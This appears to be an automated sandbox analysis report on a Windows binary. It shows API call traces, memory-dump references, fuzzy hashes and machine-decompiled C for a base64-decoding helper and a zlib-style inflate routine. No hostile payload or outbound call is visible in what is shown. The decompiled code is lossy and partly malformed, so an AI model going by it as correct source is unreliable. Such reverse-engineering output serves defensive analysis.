CryptStringToBinaryA.CRYPT32(C,00000000,00000001,00000000,00419ABE,00000000,00000000), ref: 00414FE7
LocalAlloc.KERNEL32(00000040,00000000,?,00419ABE,000000FF,0043EEE8,00000000,00000000,?,?,?,C21D6F0A,?,00000000,?,0043EEE8), ref: 00414FF6
CryptStringToBinaryA.CRYPT32(C,00000000,00000001,00000000,00419ABE,00000000,00000000), ref: 0041500D
LocalFree.KERNEL32(?,?,00419ABE,000000FF,0043EEE8,00000000,00000000,?,?,?,C21D6F0A,?,00000000,?,0043EEE8,000000FF), ref: 0041501C

Strings

C, xrefs: 00414FC4, 00414FE0, 0041500C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: C
API String ID: 4291131564-2515487769
Opcode ID: b81a6202c72311832ee94ff276c2f1c3b5606649f6e7426300a3775efa481e07
Instruction ID: 506cd71a562c4e5de23be9ec0303154b23231893f21e3c2c8d01a1795e4f3232
Opcode Fuzzy Hash: b81a6202c72311832ee94ff276c2f1c3b5606649f6e7426300a3775efa481e07
Instruction Fuzzy Hash: CC01F8753407157BE7205F95AC45F97BB9CEF49B61F100025FB44D72C0D6B5A84087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00401430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401430(intOrPtr __ebx, char* _a4) {
				signed int _v8;
				char _v20007;
				char _v20008;
				int _v20012;
				void* __edi;
				void* __esi;
				signed int _t13;
				int _t21;
				char* _t22;
				intOrPtr _t24;
				void* _t29;
				intOrPtr _t31;
				void* _t32;
				char* _t33;
				intOrPtr _t34;
				signed int _t35;

				_t24 = __ebx;
				E0042BC40(0x4e28);
				_t13 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t13 ^ _t35;
				_t33 = _a4;
				_v20008 = 0;
				E0042A2F0( &_v20007, 0, 0x4e1f);
				_v20012 = 0;
				CryptStringToBinaryA(_t33, E004204B0(_t33), 1, 0,  &_v20012, 0, 0);
				_t28 =  &_v20012;
				_t21 = CryptStringToBinaryA(_t33, E004204B0(_t33), 1,  &_v20008,  &_v20012, 0, 0);
				_t31 = _t29;
				_t34 = _t32;
				_t22 =  &_v20008;
				if(_t21 == 0) {
					_t22 = "UNK";
				}
				return E0042A36A(_t22, _t24, _v8 ^ _t35, _t28, _t31, _t34);
			}

0x00401430
0x00401438
0x0040143d
0x00401444
0x00401448
0x0040145a
0x00401461
0x00401479
0x00401493
0x00401499
0x004014b4
0x004014b6
0x004014b9
0x004014ba
0x004014c0
0x004014c2
0x004014c2
0x004014d4

APIs

_memset.LIBCMT ref: 00401461
CryptStringToBinaryA.CRYPT32(?,00000000,00000000), ref: 00401493
CryptStringToBinaryA.CRYPT32(?,00000000,00000000,00000000), ref: 004014B4

Strings

UNK, xrefs: 004014C2

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: BinaryCryptString$_memset
String ID: UNK
API String ID: 3509671036-448974810
Opcode ID: 5380307d868b47770e079922dbe3b4367eb327c9be3e423b764869bad71d1beb
Instruction ID: 20022b261ebe7a75cd06cc3cbae7474351c2c89b608337d7939c24728839721c
Opcode Fuzzy Hash: 5380307d868b47770e079922dbe3b4367eb327c9be3e423b764869bad71d1beb
Instruction Fuzzy Hash: 5511A9B2A402586AE710F755ED02FDA73ACFB48715F4000A5FB04A61C1D6F46E548BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00407C20 Relevance: 4.6, Strings: 3, Instructions: 811
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00407C20(unsigned int _a4, unsigned int _a8, signed int _a12) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _t403;
				unsigned int _t407;
				unsigned int* _t409;
				signed int _t411;
				signed int _t412;
				void* _t418;
				signed int _t427;
				unsigned int _t429;
				signed int _t439;
				signed int* _t441;

				_t409 = _a8;
				_t441 = _a4;
				_t427 = _t441[0xd];
				_v12 = _t409[1];
				_t411 = _t441[0xc];
				_v8 =  *_t409;
				_t403 = _t441[8];
				_t439 = _t441[7];
				_a8 = _t403;
				_a4 = _t427;
				if(_t427 >= _t411) {
					_t429 = _t441[0xb] - _a4;
					_v20 = _t429;
				} else {
					_v20 = _t411 - _t427 - 1;
				}
				_t412 =  *_t441;
				if(_t412 <= 9) {
					do {
						switch( *((intOrPtr*)(_t412 * 4 +  &M004085B8))) {
							case 0:
								__eflags = _t439 - 3;
								if(_t439 >= 3) {
									L14:
									_t414 = _t403 & 0x00000007;
									_t415 = _t414 >> 1;
									_t441[6] = _t414 & 0x00000001;
									__eflags = _t415 - 3;
									if(_t415 > 3) {
										goto L104;
									} else {
										switch( *((intOrPtr*)(_t415 * 4 +  &M004085E0))) {
											case 0:
												goto L16;
											case 1:
												goto L17;
											case 2:
												goto L19;
											case 3:
												goto L109;
										}
									}
								} else {
									_t421 = 1;
									while(1) {
										__eflags = _v12;
										if(_v12 == 0) {
											goto L106;
										}
										_v12 = _v12 - _t421;
										_t436 = ( *_v8 & 0x000000ff) << _t439;
										_t421 = 1;
										_v8 = _v8 + 1;
										_t439 = _t439 + 8;
										_t403 = _t403 | _t436;
										_a12 = 0;
										_a8 = _t403;
										__eflags = _t439 - 3;
										if(_t439 < 3) {
											continue;
										} else {
											goto L14;
										}
										goto L130;
									}
									goto L106;
								}
								goto L130;
							case 1:
								__eflags = __edi - 0x20;
								if(__edi >= 0x20) {
									L24:
									__ecx = __eax;
									__eax =  !__eax;
									__ecx = __ecx & 0x0000ffff;
									__eax = __eax >> 0x10;
									__eflags = __eax - __ecx;
									if(__eax != __ecx) {
										 *__esi = 9;
										__ebx[6] = "invalid stored block lengths";
										_push(0xfffffffd);
										goto L5;
									} else {
										__eax = 0;
										__edi = 0;
										__esi[1] = __ecx;
										_a8 = 0;
										__eflags = __ecx;
										if(__ecx == 0) {
											__esi[6] =  ~(__esi[6]);
											asm("sbb ecx, ecx");
											__ecx =  ~(__esi[6]) & 0x00000007;
											 *__esi = __ecx;
										} else {
											__ecx = 2;
											 *__esi = 2;
										}
										goto L104;
									}
								} else {
									__ecx = 1;
									while(1) {
										__eflags = _v12;
										if(_v12 == 0) {
											goto L110;
										}
										_v12 = _v12 - __ecx;
										__ecx = _v8;
										__edx =  *_v8 & 0x000000ff;
										__ecx = __edi;
										__edx = ( *_v8 & 0x000000ff) << __cl;
										__ecx = 1;
										_v8 = _v8 + 1;
										__edi = __edi + 8;
										__eax = __eax | __edx;
										_a12 = 0;
										_a8 = __eax;
										__eflags = __edi - 0x20;
										if(__edi < 0x20) {
											continue;
										} else {
											goto L24;
										}
										goto L130;
									}
									goto L110;
								}
								goto L130;
							case 2:
								__eflags = _v12;
								if(_v12 == 0) {
									L110:
									__eax = _a8;
									__esi[8] = _a8;
									goto L107;
								} else {
									__eflags = __edx;
									if(__edx != 0) {
										L46:
										__eax = __esi[1];
										__ecx = _v12;
										_a12 = 0;
										_v16 = __eax;
										__eflags = __eax - __ecx;
										if(__eax > __ecx) {
											__eax = __ecx;
											_v16 = __ecx;
										}
										__ecx = _v20;
										__eflags = __eax - __ecx;
										if(__eax > __ecx) {
											_v16 = __ecx;
										}
										__edx = _v16;
										__eax = _v8;
										__ecx = _a4;
										__eax = E0042B8D0(_a4, _v8, _v16);
										__eax = _v16;
										_v8 = _v8 + __eax;
										_v12 = _v12 - __eax;
										_a4 = _a4 + __eax;
										_v20 = _v20 - __eax;
										_t101 =  &(__esi[1]);
										 *_t101 = __esi[1] - __eax;
										__eflags =  *_t101;
										if( *_t101 == 0) {
											__esi[6] =  ~(__esi[6]);
											asm("sbb edx, edx");
											__edx =  ~(__esi[6]) & 0x00000007;
											 *__esi = __edx;
										}
										goto L103;
									} else {
										__edx = __esi[0xb];
										__eflags = _a4 - __edx;
										if(_a4 != __edx) {
											L36:
											__ecx = _a12;
											__eax = _a4;
											__esi[0xd] = _a4;
											__eax = E00404E70(_a12, __esi, __ebx, _a12);
											__ecx = __esi[0xc];
											_a12 = __eax;
											__eax = __esi[0xd];
											_a4 = __eax;
											__eflags = __eax - __ecx;
											if(__eax >= __ecx) {
												__eax = __esi[0xb];
												__eax = __esi[0xb] - _a4;
												__eflags = __eax;
												_v20 = __eax;
												__edx = __eax;
											} else {
												__ecx = __ecx - __eax;
												__edx = __ecx - __eax - 1;
												_v20 = __edx;
											}
											__eax = __esi[0xb];
											__eflags = _a4 - __esi[0xb];
											if(_a4 == __esi[0xb]) {
												__eax = __esi[0xa];
												__eflags = __eax - __ecx;
												if(__eflags != 0) {
													_a4 = __eax;
													if(__eflags >= 0) {
														__edx = __esi[0xb];
														__edx = __esi[0xb] - __eax;
														__eflags = __edx;
													} else {
														__edx = __ecx - 1;
													}
													_v20 = __edx;
												}
											}
											__eflags = __edx;
											if(__edx == 0) {
												__ecx = _a8;
												__eax = _v8;
												__edx = _v12;
												__esi[8] = _a8;
												__esi[7] = __edi;
												__ecx = __eax;
												__ecx = __eax -  *__ebx;
												 *__ebx = __eax;
												__eax = _a12;
												__ebx[1] = _v12;
												_push(_a12);
												goto L7;
											} else {
												goto L46;
											}
										} else {
											__eax = __esi[0xc];
											__ecx = __esi[0xa];
											__eflags = __ecx - __eax;
											if(__eflags == 0) {
												goto L36;
											} else {
												_a4 = __ecx;
												if(__eflags >= 0) {
													__edx = __edx - __ecx;
													__eflags = __edx;
													__eax = __edx;
													_v20 = __edx;
												} else {
													__eax = __eax - __ecx;
													__eax = __eax - 1;
													_v20 = __eax;
												}
												__eflags = __eax;
												if(__eax != 0) {
													goto L46;
												} else {
													goto L36;
												}
											}
										}
									}
								}
								goto L130;
							case 3:
								__eflags = __edi - 0xe;
								if(__edi >= 0xe) {
									L56:
									__eax = __eax & 0x00003fff;
									__ecx = __eax;
									__ecx = __eax & 0x0000001f;
									__esi[1] = __eax;
									__eflags = __ecx - 0x1d;
									if(__ecx > 0x1d) {
										L115:
										 *__esi = 9;
										__ebx[6] = "too many length or distance symbols";
										goto L116;
									} else {
										__eax = __eax >> 5;
										__eax = __eax & 0x0000001f;
										__eflags = __eax - 0x1d;
										if(__eax > 0x1d) {
											goto L115;
										} else {
											__edx = __ebx[8];
											__eax = __eax + __ecx + 0x102;
											__ecx = __ebx[0xa];
											_push(4);
											_push(__eax);
											_push(__ecx);
											__eax =  *(__ebx[8])();
											__esp = __esp + 0xc;
											__esi[3] = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												goto L114;
											} else {
												_a8 = _a8 >> 0xe;
												__eax = _a8;
												__edi = __edi - 0xe;
												__eflags = __edi;
												__esi[2] = 0;
												 *__esi = 4;
												goto L60;
											}
										}
									}
								} else {
									__ecx = 1;
									while(1) {
										__eflags = _v12;
										if(_v12 == 0) {
											goto L113;
										}
										_v12 = _v12 - __ecx;
										__ecx = _v8;
										__edx =  *_v8 & 0x000000ff;
										__ecx = __edi;
										__edx = ( *_v8 & 0x000000ff) << __cl;
										__ecx = 1;
										_v8 = _v8 + 1;
										__edi = __edi + 8;
										__eax = __eax | ( *_v8 & 0x000000ff) << __cl;
										_a12 = 0;
										_a8 = __eax;
										__eflags = __edi - 0xe;
										if(__edi < 0xe) {
											continue;
										} else {
											goto L56;
										}
										goto L130;
									}
									goto L113;
								}
								goto L130;
							case 4:
								L60:
								__esi[1] = __esi[1] >> 0xa;
								__ecx = (__esi[1] >> 0xa) + 4;
								__eflags = __esi[2] - (__esi[1] >> 0xa) + 4;
								if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
									L66:
									__eflags = __esi[2] - 0x13;
									if(__esi[2] < 0x13) {
										__eax = 1;
										do {
											__ecx = __esi[2];
											__edx =  *(0x444de0 + __esi[2] * 4);
											__ecx = __esi[3];
											 *(__esi[3] +  *(0x444de0 + __esi[2] * 4) * 4) = 0;
											__esi[2] = __esi[2] + 1;
											__eflags = __esi[2] - 0x13;
										} while (__esi[2] < 0x13);
									}
									__esi[9] = __esi[3];
									__ecx =  &(__esi[5]);
									__eax =  &(__esi[4]);
									__esi[4] = 7;
									__eax = E004056E0( &(__esi[5]), __esi[3],  &(__esi[4]),  &(__esi[5]), __esi[9], __ebx);
									_v16 = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = _v16 - 0xfffffffd;
										if(_v16 == 0xfffffffd) {
											__edx = __esi[3];
											__eax = __ebx[0xa];
											__ecx = __ebx[9];
											_push(__esi[3]);
											_push(__ebx[0xa]);
											__eax =  *(__ebx[9])();
											__esp = __esp + 8;
											 *__esi = 9;
										}
										__edx = _a8;
										__eax = _v12;
										__esi[8] = _a8;
										__esi[7] = __edi;
										__ebx[1] = _v12;
										__eax = _v8;
										__ecx = __eax;
										__ecx = __eax -  *__ebx;
										 *__ebx = __eax;
										__eax = _v16;
										_push(_v16);
										goto L7;
									} else {
										__esi[2] = __eax;
										__eax = _a8;
										 *__esi = 5;
										goto L71;
									}
								} else {
									do {
										__eflags = __edi - 3;
										if(__edi >= 3) {
											goto L65;
										} else {
											__ecx = 1;
											while(1) {
												__eflags = _v12;
												if(_v12 == 0) {
													goto L113;
												}
												__edx = _v8;
												_v12 = _v12 - __ecx;
												__edx =  *_v8 & 0x000000ff;
												__ecx = __edi;
												__edx = ( *_v8 & 0x000000ff) << __cl;
												__ecx = 1;
												_v8 = _v8 + 1;
												__edi = __edi + 8;
												__eax = __eax | ( *_v8 & 0x000000ff) << __cl;
												_a12 = 0;
												_a8 = __eax;
												__eflags = __edi - 3;
												if(__edi < 3) {
													continue;
												} else {
													goto L65;
												}
												goto L130;
											}
											goto L113;
										}
										goto L130;
										L65:
										__ecx = __esi[2];
										__edx =  *(0x444de0 + __esi[2] * 4);
										__ecx = __esi[3];
										 *(__esi[3] +  *(0x444de0 + __esi[2] * 4) * 4) = __eax;
										__esi[2] = __esi[2] + 1;
										__edx = __esi[1];
										__eax = _a8;
										__edx = __esi[1] >> 0xa;
										__eax = _a8 >> 3;
										__edx = (__esi[1] >> 0xa) + 4;
										__edi = __edi - 3;
										_a8 = __eax;
										__eflags = __esi[2] - (__esi[1] >> 0xa) + 4;
									} while (__esi[2] < (__esi[1] >> 0xa) + 4);
									goto L66;
								}
								goto L130;
							case 5:
								L71:
								__ecx = __esi[1];
								__ecx = __ecx >> 5;
								__edx = __ecx >> 0x00000005 & 0x0000001f;
								__ecx = __ecx & 0x0000001f;
								__ecx = __edx + __ecx + 0x102;
								__eflags = __esi[2] - __ecx;
								if(__esi[2] >= __ecx) {
									L94:
									__ecx = __esi[9];
									__eax = __esi[1];
									__edx =  &_v40;
									__ecx =  &_v36;
									 &_v20 = __esi[3];
									 &_v24 = __eax;
									__eax >> 5 = __eax >> 0x00000005 & 0x0000001f;
									__ecx = (__eax >> 0x00000005 & 0x0000001f) + 1;
									__eax = __eax + 0x101;
									__esi[5] = 0;
									_v24 = 9;
									_v20 = 6;
									__eax = E00405780(__ecx, __eax, __ecx, __esi[3],  &_v24,  &_v20,  &_v36,  &_v40, __esi[9], __ebx);
									_v16 = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = _v16 - 0xfffffffd;
										if(_v16 == 0xfffffffd) {
											__eax = __esi[3];
											__ecx = __ebx[0xa];
											__edx = __ebx[9];
											_push(__esi[3]);
											_push(__ebx[0xa]);
											__eax =  *(__ebx[9])();
											__esp = __esp + 8;
											 *__esi = 9;
										}
										__eax = _a8;
										__ecx = _v12;
										__esi[8] = _a8;
										__eax = _v8;
										__esi[7] = __edi;
										__ebx[1] = _v12;
										__ecx = _v16;
										__eax = __eax -  *__ebx;
										_t377 =  &(__ebx[2]);
										 *_t377 = __ebx[2] + __eax -  *__ebx;
										__eflags =  *_t377;
										 *__ebx = __eax;
										__eax = _a4;
										__esi[0xd] = _a4;
										return E00404E70(_v16, __esi, __ebx, _v16);
									} else {
										__edx = __ebx[0xa];
										__eax = __ebx[8];
										_push(0x1c);
										_push(1);
										_push(__ebx[0xa]);
										__eax =  *(__ebx[8])();
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax == 0) {
											L114:
											__edx = _a8;
											__eax = _v12;
											__esi[8] = _a8;
											__esi[7] = __edi;
											__ebx[1] = _v12;
											_push(0xfffffffc);
											goto L6;
										} else {
											__cl = _v24;
											 *(__eax + 0x10) = __cl;
											__ecx = _v36;
											 *((char*)(__eax + 0x11)) = _v20;
											__edx = _v40;
											 *__eax = 0;
											 *(__eax + 0x14) = _v36;
											 *(__eax + 0x18) = _v40;
											__esi[1] = __eax;
											__eax = __esi[3];
											__ecx = __ebx[0xa];
											__edx = __ebx[9];
											_push(__esi[3]);
											_push(__ebx[0xa]);
											__eax =  *(__ebx[9])();
											__esp = __esp + 8;
											 *__esi = 6;
											goto L97;
										}
									}
								} else {
									__edx = 1;
									while(1) {
										__ecx = __esi[4];
										__eflags = __edi - __ecx;
										if(__edi >= __ecx) {
											goto L77;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											__eflags = _v12;
											if(_v12 == 0) {
												break;
											}
											_v12 = _v12 - __edx;
											_v8 =  *_v8 & 0x000000ff;
											__ecx = __edi;
											__edx = ( *_v8 & 0x000000ff) << __cl;
											__ecx = __esi[4];
											__edi = __edi + 8;
											_a12 = 0;
											__eax = __eax | ( *_v8 & 0x000000ff) << __cl;
											__edx = 1;
											_v8 = _v8 + 1;
											_a8 = __eax;
											__eflags = __edi - __ecx;
											if(__edi < __ecx) {
												continue;
											} else {
												goto L77;
											}
											goto L130;
										}
										L113:
										__ecx = _a8;
										__eax = _v8;
										__esi[8] = _a8;
										__ecx = _a12;
										__esi[7] = __edi;
										__eax = __eax -  *__ebx;
										_t320 =  &(__ebx[2]);
										 *_t320 = __ebx[2] + __eax -  *__ebx;
										__eflags =  *_t320;
										 *__ebx = __eax;
										__eax = _a4;
										__ebx[1] = 0;
										__esi[0xd] = _a4;
										return E00404E70(_a12, __esi, __ebx, _a12);
										goto L130;
										L77:
										__ecx =  *(0x443c70 + __ecx * 4);
										__edx = __esi[5];
										__edx = __esi[5] + __ecx * 8;
										__ecx =  *(__edx + 1) & 0x000000ff;
										__edx =  *(__edx + 4);
										_v16 = __ecx;
										_v32 = __edx;
										__eflags = __edx - 0x10;
										if(__edx >= 0x10) {
											__eflags = __edx - 0x12;
											if(__edx != 0x12) {
												__ecx = __edx - 0xe;
												_v24 = __edx - 0xe;
											} else {
												_v24 = 7;
											}
											__ecx = 0;
											__eflags = __edx - 0x12;
											0 | __edx == 0x00000012 = 3 + (__edx == 0x12) * 8;
											_v20 = 3 + (__edx == 0x12) * 8;
											__ecx = _v16;
											__ecx = _v16 + _v24;
											_v28 = __ecx;
											__eflags = __edi - __ecx;
											if(__edi >= __ecx) {
												L86:
												__ecx = _v16;
												__eax = __eax >> __cl;
												__ecx = _v24;
												 *(0x443c70 + __ecx * 4) =  *(0x443c70 + __ecx * 4) & __eax;
												_v20 = _v20 + ( *(0x443c70 + __ecx * 4) & __eax);
												__eax = __eax >> __cl;
												__edi = __edi - __ecx;
												__ecx = __esi[2];
												_a8 = __eax;
												__eax = __esi[1];
												__eax = __eax >> 5;
												__edx = __eax >> 0x00000005 & 0x0000001f;
												__eax = __eax & 0x0000001f;
												__eax = __edx + __eax + 0x102;
												_v20 = _v20 + __ecx;
												__eflags = _v20 + __ecx - __eax;
												if(_v20 + __ecx > __eax) {
													L120:
													__ecx = __esi[3];
													__edx = __ebx[0xa];
													__eax = __ebx[9];
													_push(__esi[3]);
													_push(__ebx[0xa]);
													__eax =  *(__ebx[9])();
													__ecx = _a8;
													__eax = _v8;
													__edx = _v12;
													 *__esi = 9;
													__ebx[6] = "invalid bit length repeat";
													__esi[8] = _a8;
													__esi[7] = __edi;
													__ecx = __eax;
													__ecx = __eax -  *__ebx;
													_t361 =  &(__ebx[2]);
													 *_t361 = __ebx[2] + __ecx;
													__eflags =  *_t361;
													__ebx[1] = _v12;
													__edx = _a4;
													 *__ebx = __eax;
													__esi[0xd] = _a4;
													return E00404E70(__ecx, __esi, __ebx, 0xfffffffd);
												} else {
													__eflags = _v32 - 0x10;
													if(_v32 != 0x10) {
														__eax = 0;
														__eflags = 0;
														goto L91;
													} else {
														__eflags = __ecx - 1;
														if(__ecx < 1) {
															goto L120;
														} else {
															__eax = __esi[3];
															__eax =  *(__esi[3] + __ecx * 4 - 4);
															do {
																L91:
																__edx = __esi[3];
																 *(__esi[3] + __ecx * 4) = __eax;
																__ecx = __ecx + 1;
																_t233 =  &_v20;
																 *_t233 = _v20 - 1;
																__eflags =  *_t233;
															} while ( *_t233 != 0);
															__esi[2] = __ecx;
															__edx = 1;
															goto L93;
														}
													}
												}
											} else {
												__ecx = 1;
												while(1) {
													__eflags = _v12;
													if(_v12 == 0) {
														break;
													}
													__edx = _v8;
													_v12 = _v12 - __ecx;
													__edx =  *_v8 & 0x000000ff;
													__ecx = __edi;
													__edx = ( *_v8 & 0x000000ff) << __cl;
													__ecx = 1;
													_v8 = _v8 + 1;
													__edi = __edi + 8;
													__eax = __eax | ( *_v8 & 0x000000ff) << __cl;
													_a12 = 0;
													_a8 = __eax;
													__eflags = __edi - _v28;
													if(__edi < _v28) {
														continue;
													} else {
														goto L86;
													}
													goto L130;
												}
												L106:
												_t441[8] = _a8;
												L107:
												_t404 = _v8;
												_t441[7] = _t439;
												_t418 = _t404 -  *_t409;
												 *_t409 = _t404;
												_t409[1] = 0;
												_push(_a12);
												goto L7;
											}
										} else {
											__eax = __eax >> __cl;
											__edi = __edi - __ecx;
											__ecx = __esi[3];
											_a8 = __eax;
											__eax = __esi[2];
											 *(__esi[3] + __esi[2] * 4) = __edx;
											__edx = 1;
											__esi[2] = __esi[2] + 1;
											L93:
											__eax = __esi[1];
											__eax = __eax >> 5;
											__ecx = __eax >> 0x00000005 & 0x0000001f;
											__eax = __eax & 0x0000001f;
											__eax = __ecx + __eax + 0x102;
											__eflags = __esi[2] - __eax;
											if(__esi[2] < __eax) {
												__eax = _a8;
												__ecx = __esi[4];
												__eflags = __edi - __ecx;
												if(__edi >= __ecx) {
													goto L77;
												} else {
													goto L75;
												}
											} else {
												goto L94;
											}
										}
										goto L130;
									}
								}
								goto L130;
							case 6:
								L97:
								__eax = _a8;
								__ecx = _v12;
								__esi[8] = _a8;
								__eax = _v8;
								__esi[7] = __edi;
								__ebx[1] = _v12;
								__ecx = _a12;
								__eax = __eax -  *__ebx;
								__ebx[2] = __ebx[2] + __eax -  *__ebx;
								 *__ebx = __eax;
								__eax = _a4;
								__esi[0xd] = _a4;
								__eax = E004075B0(__esi, __ebx, _a12);
								__eflags = __eax - 1;
								if(__eax != 1) {
									goto L127;
								} else {
									__edx = __esi[1];
									__eax = __ebx[0xa];
									__ecx = __ebx[9];
									_push(__esi[1]);
									_push(__ebx[0xa]);
									_a12 = 0;
									 *(__ebx[9])() = __ebx[1];
									__ecx = __esi[8];
									__edx =  *__ebx;
									__edi = __esi[7];
									_v12 = __ebx[1];
									__eax = __esi[0xc];
									_a8 = __esi[8];
									__ecx = __esi[0xd];
									__esp = __esp + 8;
									_v8 = __edx;
									_a4 = __ecx;
									__eflags = __ecx - __eax;
									if(__ecx >= __eax) {
										__eax = __esi[0xb];
										__eax = __esi[0xb] - __ecx;
										__eflags = __eax;
									} else {
										__eax = __eax - __ecx;
										__eax = __eax - 1;
									}
									__eflags = __esi[6];
									_v20 = __eax;
									if(__esi[6] != 0) {
										 *__esi = 7;
										goto L125;
									} else {
										 *__esi = 0;
										goto L103;
									}
								}
								goto L130;
							case 7:
								L125:
								__ecx = _a12;
								__eax = _a4;
								__esi[0xd] = _a4;
								__eax = E00404E70(_a12, __esi, __ebx, _a12);
								__ecx = __esi[0xd];
								_a4 = __ecx;
								__eflags = __esi[0xc] - __ecx;
								if(__esi[0xc] == __ecx) {
									 *__esi = 8;
									goto L129;
								} else {
									__edx = _a8;
									__ecx = _v12;
									__esi[8] = _a8;
									__esi[7] = __edi;
									__ebx[1] = _v12;
									__ecx = _v8;
									__edx = __ecx;
									__edx = __ecx -  *__ebx;
									 *__ebx = __ecx;
									__ecx = _a4;
									_t394 =  &(__ebx[2]);
									 *_t394 = __ebx[2] + __edx;
									__eflags =  *_t394;
									__esi[0xd] = __ecx;
									L127:
									return __eax;
								}
								goto L130;
							case 8:
								L129:
								__edx = _a8;
								__eax = _v12;
								__esi[8] = _a8;
								__esi[7] = __edi;
								__ebx[1] = _v12;
								_push(1);
								goto L6;
							case 9:
								L116:
								__eax = _a8;
								__ecx = _v12;
								__esi[8] = _a8;
								__eax = _v8;
								__esi[7] = __edi;
								__eax = __eax -  *__ebx;
								_t336 =  &(__ebx[2]);
								 *_t336 = __ebx[2] + __eax -  *__ebx;
								__eflags =  *_t336;
								 *__ebx = __eax;
								__eax = _a4;
								__ebx[1] = __ecx;
								__esi[0xd] = _a4;
								return E00404E70(__ecx, __esi, __ebx, 0xfffffffd);
								goto L130;
							case 0xa:
								L16:
								_t440 = _t439 - 3;
								_t420 = _t440 & 0x00000007;
								_t403 = _t403 >> 3 >> _t420;
								_t439 = _t440 - _t420;
								 *_t441 = 1;
								_a8 = _t403;
								goto L104;
							case 0xb:
								L17:
								__eax = E00404F80(9, 5, 0x443ce0, 0x444ce0, __ebx);
								__esi[1] = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									_push(0xfffffffc);
									goto L5;
								} else {
									_a8 = _a8 >> 3;
									__edi = __edi - 3;
									 *__esi = 6;
									L103:
									__eax = _a8;
									goto L104;
								}
								goto L130;
							case 0xc:
								L19:
								__eax = __eax >> 3;
								_a8 = __eax;
								__edi = __edi - 3;
								 *__esi = 3;
								goto L104;
							case 0xd:
								L109:
								_a8 = _a8 >> 3;
								 *__esi = 9;
								__ebx[6] = "invalid block type";
								__esi[8] = _a8 >> 3;
								__eax = _v12;
								__esi[7] = __edi;
								__ebx[1] = _v12;
								_push(0xfffffffd);
								goto L6;
						}
						L104:
						_t412 =  *_t441;
					} while (_t412 <= 9);
					goto L4;
				} else {
					L4:
					_push(0xfffffffe);
					L5:
					_t441[8] = _a8;
					_t441[7] = _t439;
					_t409[1] = _v12;
					L6:
					_t407 = _v8;
					_t418 = _t407 -  *_t409;
					 *_t409 = _t407;
					L7:
					_t409[2] = _t409[2] + _t418;
					_push(_t409);
					_push(_t441);
					_t441[0xd] = _a4;
					return E00404E70(_t418);
				}
				L130:
			}

0x00407c27
0x00407c30
0x00407c33
0x00407c36
0x00407c39
0x00407c3c
0x00407c3f
0x00407c43
0x00407c46
0x00407c49
0x00407c4e
0x00407c5d
0x00407c60
0x00407c50
0x00407c55
0x00407c55
0x00407c63
0x00407c68
0x00407ca3
0x00407ca3
0x00000000
0x00407caa
0x00407cad
0x00407ce7
0x00407ce9
0x00407cf1
0x00407cf3
0x00407cf6
0x00407cf9
0x00000000
0x00407cff
0x00407cff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407cff
0x00407caf
0x00407caf
0x00407cb4
0x00407cb4
0x00407cb8
0x00000000
0x00000000
0x00407cbe
0x00407cc9
0x00407ccb
0x00407cd0
0x00407cd3
0x00407cd6
0x00407cd8
0x00407cdf
0x00407ce2
0x00407ce5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407ce5
0x00000000
0x00407cb4
0x00000000
0x00000000
0x00407d6b
0x00407d6e
0x00407da8
0x00407da8
0x00407daa
0x00407dac
0x00407db2
0x00407db5
0x00407db7
0x004083a2
0x004083a8
0x004083af
0x00000000
0x00407dbd
0x00407dbd
0x00407dbf
0x00407dc1
0x00407dc4
0x00407dc7
0x00407dc9
0x00407dda
0x00407ddc
0x00407dde
0x00407de1
0x00407dcb
0x00407dcb
0x00407dd0
0x00407dd0
0x00000000
0x00407dc9
0x00407d70
0x00407d70
0x00407d75
0x00407d75
0x00407d79
0x00000000
0x00000000
0x00407d7f
0x00407d82
0x00407d85
0x00407d88
0x00407d8a
0x00407d8c
0x00407d91
0x00407d94
0x00407d97
0x00407d99
0x00407da0
0x00407da3
0x00407da6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407da6
0x00000000
0x00407d75
0x00000000
0x00000000
0x00407de8
0x00407dec
0x0040839a
0x0040839a
0x0040839d
0x00000000
0x00407df2
0x00407df2
0x00407df4
0x00407e88
0x00407e88
0x00407e8b
0x00407e8e
0x00407e95
0x00407e98
0x00407e9a
0x00407e9c
0x00407e9e
0x00407e9e
0x00407ea1
0x00407ea4
0x00407ea6
0x00407ea8
0x00407ea8
0x00407eab
0x00407eae
0x00407eb1
0x00407eb7
0x00407ebc
0x00407ebf
0x00407ec2
0x00407ec5
0x00407ec8
0x00407ece
0x00407ece
0x00407ece
0x00407ed1
0x00407eda
0x00407edc
0x00407ede
0x00407ee1
0x00407ee1
0x00000000
0x00407dfa
0x00407dfa
0x00407dfd
0x00407e00
0x00407e24
0x00407e24
0x00407e27
0x00407e2d
0x00407e30
0x00407e35
0x00407e38
0x00407e3b
0x00407e41
0x00407e44
0x00407e46
